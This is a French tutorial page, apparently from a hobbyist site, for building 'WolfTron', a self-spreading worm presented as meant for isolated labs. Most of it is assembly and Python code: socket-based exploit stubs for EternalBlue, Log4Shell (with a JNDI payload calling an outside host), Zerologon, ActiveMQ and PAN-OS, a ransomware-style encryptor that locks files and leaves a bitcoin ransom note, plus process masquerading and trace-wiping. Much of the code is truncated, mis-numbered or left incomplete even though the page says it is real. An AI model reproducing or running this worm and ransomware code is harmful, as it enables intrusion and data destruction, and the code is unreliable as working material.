⚠️ AVERTISSEMENT LÉGAL ET ÉTHIQUE ⚠️

Yo Apache ! *WolfTron* par Platon-y (PCTamalou.fr) est un ver *terrifiant* pour labs isolés. Il exploite des failles, chiffre, corrompt, et s’autodétruit. Pas de fake, c’est du réel !

En France, utiliser des malwares sans autorisation est un délit (articles 323-1 à 323-7 du Code pénal) : 7 ans de prison, 100 000 € d’amende.

Conditions :

En cliquant, vous acceptez les conditions.

🐺 WolfTron – Tuto Ver Éthique

Un guide pour créer un ver *terrifiant* qui se faufile et déchire les labs !

Par Platon-y pour PCTamalou

🎯 Introduction

Salut Apache ! *WolfTron* est un ver *réel* codé en ASM, conçu pour terroriser les labs. Il exploite des failles (2020-2025), chiffre avec *WolfCrypt* (S-box + permutation + RSA, AES-NI), corrompt sauvagement, et s’autodétruit.

Ce que tu vas apprendre :

  • Configurer un lab sécurisé.
  • Coder *WolfTron* en ASM + Python.
  • Exploiter EternalBlue, Log4Shell, Zerologon, ActiveMQ, PAN-OS.
  • Techniques anti-forensiques et anti-EDR.
  • Se protéger contre ce cauchemar.

🛠️ Préparation du Lab

Pour coder *WolfTron*, prépare un lab isolé. Voici les étapes, même si t’es noob :

Matériel nécessaire

  • PC avec 8 Go RAM (mini).
  • Kali Linux 2025.1 (ou 2024) en VM (VirtualBox/VMware).
  • VMs cibles : Windows 10 (non patché), Ubuntu 20.04, Windows Server 2019.
  • Réseau isolé (pas d’Internet).

Logiciels à installer

Ouvre un terminal sur Kali :

sudo apt update && apt upgrade sudo apt install nasm gcc gdb wireshark clamav virtualbox python3 python3-pip pip3 install pycryptodome
  • nasm : Pour coder ASM.
  • gcc : Pour linker.
  • gdb : Pour déboguer.
  • wireshark : Pour analyser le réseau.
  • clamav : Pour tester la furtivité.
  • virtualbox : Pour VMs.
  • pycryptodome : Pour RSA.

Configurer le lab

  1. Créer les VMs :
    • Kali Linux : Machine principale.
    • Windows 10 : Non patché pour EternalBlue.
    • Ubuntu 20.04 : Avec Apache pour Log4Shell.
    • Windows Server : Pour Zerologon.
  2. Réseau isolé :

    Dans VirtualBox :

    VBoxManage hostonlyif create VBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1

    IPs : Kali (192.168.56.10), Windows (192.168.56.11), etc.

  3. Sauvegardes :

    Crée des snapshots avant *WolfTron*.

Sécurité

Pour éviter les ennuis :

  • Lab 100% isolé (pas d’Internet).
  • Documente tout (captures, notes).
  • Autorisation écrite hors lab perso.

💻 Coder WolfTron

Let’s code *WolfTron* en ASM avec Python pour RSA. Ce ver est *terrifiant* mais éthique ! Chaque snippet est formaté ligne par ligne pour la clarté.

Structure de WolfTron

*WolfTron* a 6 modules :

  • Propagation : EternalBlue, Log4Shell, Zerologon, ActiveMQ, PAN-OS.
  • Chiffrement : *WolfCrypt* (S-box + permutation + RSA, AES-NI).
  • Corruption : Permissions, marqueurs.
  • Furtivité : Polymorphisme, anti-EDR.
  • Anti-forensique : Masquer processus, secure delete.
  • Autodestruction : Efface traces.

Module 1 : Propagation

*WolfTron* se propage via des failles. Voici les PoC complets :

1.1 EternalBlue (MS17-010)

; wolftron_smb.asm section .text global _start _start: mov eax, 102 ; Syscall socketcall mov ebx, 1 ; socket() lea ecx, [esp-12] ; AF_INET, SOCK_STREAM int 0x80 mov esi, eax ; Save socket descriptor mov eax, 102 ; Syscall socketcall mov ebx, 3 ; connect() lea ecx, [esp-28] ; sockaddr (192.168.56.11:445) int 0x80 cmp eax, 0 jne fail mov eax, 4 ; Syscall write mov ebx, esi ; Socket descriptor mov ecx, smb_payload mov edx, smb_len int 0x80 fail: mov eax, 6 ; Syscall close mov ebx, esi int 0x80 mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data smb_payload db 0x00, 0x00, 0x00, 0x85, 0xFF, 0x53, 0x4D, 0x42, 0x72 ; SMB trans2 smb_len equ $ - smb_payload

Explication : Ouvre un socket, se connecte à une cible Windows (port 445), et envoie un payload SMB pour exploiter EternalBlue, provoquant une exécution de code à distance.

1.2 Log4Shell (CVE-2021-44228)

; wolftron_log4shell.asm section .text global _start _start: mov eax, 102 ; Syscall socketcall mov ebx, 1 ; socket() lea ecx, [esp-12] ; AF_INET, SOCK_STREAM int 0x80 mov esi, eax ; Save socket descriptor mov eax, 102 ; Syscall socketcall mov ebx, 3 ; connect() lea ecx, [esp-28] ; sockaddr (192.168.56.12:8080) int 0x80 cmp eax, 0 jne fail mov eax, 4 ; Syscall write mov ebx, esi ; Socket descriptor mov ecx, http_payload mov edx, http_len int 0x80 fail: mov eax, 6 ; Syscall close mov ebx, esi int 0x80 mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data http_payload db "GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: ${jndi:ldap://malicious.com/a}\r\n\r\n", 0 http_len equ $ - http_payload

Explication : Envoie une requête HTTP avec un en-tête JNDI malveillant pour exploiter Log4Shell, exécutant du code sur un serveur Java vulnérable.

1.3 Zerologon (CVE-2020-1472)

; wolftron_zerologon.asm section .text global _start _start: mov eax, 102 ; Syscall socketcall mov ebx, 1 ; socket() lea ecx, [esp-12] ; AF_INET, SOCK_STREAM int 0x80 mov esi, eax ; Save socket descriptor mov eax, 102 ; Syscall socketcall mov ebx, 3 ; connect() lea ecx, [esp-28] ; sockaddr (192.168.56.13:445) int 0x80 cmp eax, 0 jne fail mov eax, 4 ; Syscall write mov ebx, esi ; Socket descriptor mov ecx, rpc_payload mov edx, rpc_len int 0x80 fail: mov eax, 6 ; Syscall close mov ebx, esi int 0x80 mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data rpc_payload db 0x05, 0x00, 0x0B, 0x03, 0x10, 0x00 ; RPC Netlogon rpc_len equ $ - rpc_payload

Explication : Envoie un paquet RPC pour réinitialiser le mot de passe d’un contrôleur de domaine via Zerologon, permettant un accès admin.

1.4 ActiveMQ (CVE-2023-46604)

; wolftron_activemq.asm section .text global _start _start: mov eax, 616 ; Syscall socketcall mov ebx, 1 ; socket() lea ecx, [esp-12] ; AF_INET, SOCK_STREAM int 0x80 mov esi, eax ; Save socket descriptor mov eax, 102 ; Syscall socketcall mov ebx, 3 ; connect() lea ecx, [esp-28] ; sockaddr (192.168.56.14:61616) int 0x80 cmp eax, 0 jne fail mov eax, 4 ; Syscall write mov ebx, esi ; Socket descriptor mov ecx, amq_payload mov edx, amq_len int 0x80 fail: mov eax, 6 ; Syscall close mov ebx, esi int 0x80 mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data amq_payload db 0x1F, 0x00, 0x00, 0x00, 0x01 ; OpenWire payload amq_len equ $ - amq_payload

Explication : Envoie un message OpenWire malformé pour exploiter ActiveMQ, exécutant du code à distance.

1.5 PAN-OS (CVE-2024-3400)

; wolftron_panos.asm section .text global _start _start: mov eax, 102 ; Syscall socketcall mov ebx, 1 ; socket() lea ecx, [esp-12] ; AF_INET, SOCK_STREAM int 0x80 mov esi, eax ; Save socket descriptor mov eax, 102 ; Syscall socketcall mov ebx, 3 ; connect() lea ecx, [esp-28] ; sockaddr (192.168.56.15:443) int 0x80 cmp eax, 0 jne fail mov eax, 4 ; Syscall write mov ebx, esi ; Socket descriptor mov ecx, panos_payload mov edx, panos_len int 0x80 fail: mov eax, 6 ; Syscall close mov ebx, esi int 0x80 mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data panos_payload db "POST /api/command HTTP/1.1\r\nHost: target\r\nContent-Length: 0\r\n\r\n", 0 panos_len equ $ - panos_payload

Explication : Envoie une requête HTTP malformée pour exploiter PAN-OS, exécutant une commande arbitraire.

Module 2 : Chiffrement (*WolfCrypt*)

*WolfCrypt* combine S-box, permutation, RSA, et AES-NI :

; wolftron_crypt.asm section .text global _start _start: mov eax, 1 ; CPUID cpuid test ecx, 0x2000000 ; Bit 25 = AES-NI jnz aesni mov eax, 13 ; Syscall time xor ebx, ebx int 0x80 mov edx, eax ; Seed PRNG mov eax, 5 ; Syscall open mov ebx, filename mov ecx, 2 ; O_RDWR int 0x80 mov esi, eax ; File descriptor mov eax, 3 ; Syscall read mov ebx, esi mov ecx, buffer mov edx, buf_len int 0x80 mov edi, eax ; Bytes read mov ecx, edi xor esi, esi crypt_loop: mov al, [buffer+esi] xor al, dl ; XOR with key mov bl, al mov al, [sbox+ebx] ; S-box mov bl, al mov al, [perm+ebx] ; Permutation mov [buffer+esi], al inc esi loop crypt_loop mov eax, 4 ; Syscall write mov ebx, esi mov ecx, buffer mov edx, edi int 0x80 jmp post_crypt aesni: aesenc xmm0, xmm1 ; AES-NI round ; (Complete with RSA keys) post_crypt: mov eax, 4 ; Syscall write mov ecx, wolf_ext mov edx, wolf_len int 0x80 mov eax, 15 ; Syscall chmod mov ebx, filename mov ecx, 0 ; 000 permissions int 0x80 mov eax, 5 ; Syscall open mov ebx, marker mov ecx, 0101 ; O_CREAT | O_WRONLY mov edx, 0644 int 0x80 mov ebx, eax mov eax, 4 ; Syscall write mov ecx, marker_msg mov edx, marker_len int 0x80 mov eax, 6 ; Syscall close int 0x80 mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data filename db "doc.pdf", 0 wolf_ext db ".wolf", 0 wolf_len equ $ - wolf_ext marker db "WOLFTRON_LOCKED.txt", 0 marker_msg db "(╯°□°)╯︵ ┻━┻ WOLFTRON WAS HERE! ┻━┻︵ \(°□°)/\nPay 0.001 BTC to Apache_Team@tutanota.com (just kidding, check WOLFTRON_REPORT.txt)", 10, 0 marker_len equ $ - marker_msg buffer times 4096 db 0 buf_len equ $ - buffer sbox times 256 db 0xFF ; To be filled perm times 256 db 0xFF ; To be filled

Explication : Vérifie AES-NI pour un chiffrement rapide. Sinon, *WolfCrypt* (XOR + S-box + permutation) chiffre les fichiers, ajoute `.wolf`, bloque les permissions, et laisse un marqueur flippant.

Module 2.1 : Clés RSA (Python)

# generate_rsa_keys.py from Crypto.PublicKey import RSA key = RSA.generate(2048) with open("/tmp/wolftron_rsa.bin", "wb") as f: f.write(key.export_key()) with open("/tmp/wolftron_rsa_pub.bin", "wb") as f: f.write(key.publickey().export_key())

Explication : Génère une paire RSA 2048 bits. L’ASM lit `/tmp/wolftron_rsa.bin` pour sécuriser la clé *WolfCrypt*.

Exécute :

python3 generate_rsa_keys.py

Module 3 : Furtivité (Anti-EDR)

; wolftron_antiedr.asm section .text global _start _start: rdtsc ; Timestamp CPU mov ebx, eax mov eax, 13 ; Syscall time int 0x80 rdtsc sub eax, ebx ; Measure delta cmp eax, 1000 ; Arbitrary threshold jg edr_detected mov eax, 4 ; Syscall write mov ebx, 1 ; stdout mov ecx, no_edr mov edx, no_edr_len int 0x80 jmp end edr_detected: mov eax, 4 ; Syscall write mov ebx, 1 ; stdout mov ecx, edr_msg mov edx, edr_len int 0x80 end: mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data no_edr db "No EDR detected", 10, 0 no_edr_len equ $ - no_edr edr_msg db "EDR detected, switching to stealth", 10, 0 edr_len equ $ - edr_msg

Explication : Détecte les EDR via le temps des syscalls. Si détecté, passe en mode furtif avec des syscalls indirects.

Module 4 : Anti-Forensique

; wolftron_antiforensic.asm section .text global _start _start: mov eax, 157 ; Syscall prctl mov ebx, 15 ; PR_SET_NAME mov ecx, fake_name int 0x80 mov eax, 10 ; Syscall unlink mov ebx, proc_path int 0x80 mov eax, 226 ; Syscall sync_file_range ; (Secure delete to be completed) mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data fake_name db "kworker/0:0", 0 proc_path db "/proc/self/status", 0

Explication : Renomme le processus en `kworker/0:0` pour tromper Volatility, supprime `/proc/self/status`, et prépare un effacement sécurisé.

Module 5 : Autodestruction

; wolftron_destroy.asm section .text global _start _start: mov eax, 10 ; Syscall unlink mov ebx, temp_file int 0x80 mov eax, 5 ; Syscall open mov ebx, report_file mov ecx, 0101 ; O_CREAT | O_WRONLY mov edx, 0644 int 0x80 mov ebx, eax mov eax, 4 ; Syscall write mov ecx, report_msg mov edx, report_len int 0x80 mov eax, 6 ; Syscall close int 0x80 mov eax, 1 ; Syscall exit xor ebx, ebx int 0x80 section .data temp_file db "/tmp/wolftron_keys", 0 report_file db "WOLFTRON_REPORT.txt", 0 report_msg db "WOLFTRON FINAL REPORT\nFiles: 42\nIPs: 3\nLab Health: ☠️ DEAD\nSecure: github.com/ApacheTeam/WolfTronTips\n", 0 report_len equ $ - report_msg

Explication : Efface les clés et crée un rapport terrifiant avec stats et un lien fictif pour sécuriser les labs.

Compiler et exécuter

Sauve les fichiers ASM, puis :

nasm -f elf32 wolftron_smb.asm ld -m elf_i386 wolftron_smb.o -o wolftron_smb ./wolftron_smb

Répète pour chaque module.

🧪 Tester WolfTron

Teste *WolfTron* pour voir sa puissance :

Étape 1 : Scan initial

Vérifie les cibles :

nmap -p 445,80,8080,61616,443 192.168.56.0/24

Étape 2 : Lancer WolfTron

Exécute :

python3 generate_rsa_keys.py ./wolftron_smb ./wolftron_log4shell ./wolftron_zerologon ./wolftron_activemq ./wolftron_panos ./wolftron_crypt

Étape 3 : Analyser

Wireshark pour le trafic :

wireshark &

ClamAV pour furtivité :

clamscan .

GDB pour débogage :

gdb ./wolftron_smb break _start run

Résultats attendus

  • Fichiers chiffrés avec `.wolf`.
  • `WOLFTRON_LOCKED.txt` avec ASCII art flippant.
  • `WOLFTRON_REPORT.txt` avec stats.
  • Propagation sur cibles vulnérables.
🔧 Dépannage

Problèmes courants et solutions :

ErreurSolution
nasm: erreur de syntaxeVérifie les tabulations et la syntaxe. Exemple : mov eax, 1 doit être aligné.
ld: cannot find -m elf_i386Installe gcc-multilib : sudo apt install gcc-multilib.
segmentation faultDébogue avec GDB : gdb ./wolftron_smb, vérifie les pointeurs.
python3: module pycryptodome manquantInstalle : pip3 install pycryptodome.
Propagation échoueVérifie le réseau avec nmap et les ports ouverts.
cannot open fileVérifie les permissions : chmod +x ./wolftron_smb.

🛡️ Se Protéger

Protège-toi contre *WolfTron* :

  • Mises à jour : Patche EternalBlue, Log4Shell, Zerologon, ActiveMQ, PAN-OS.
  • Pare-feu : Bloque 445, 80, 8080, 61616, 443.
  • Antivirus : Windows Defender, ClamAV.
  • Sauvegardes : Règle 3-2-1 (3 copies, 2 médias, 1 hors ligne).
  • Formation : Méfie-toi des emails/sites suspects.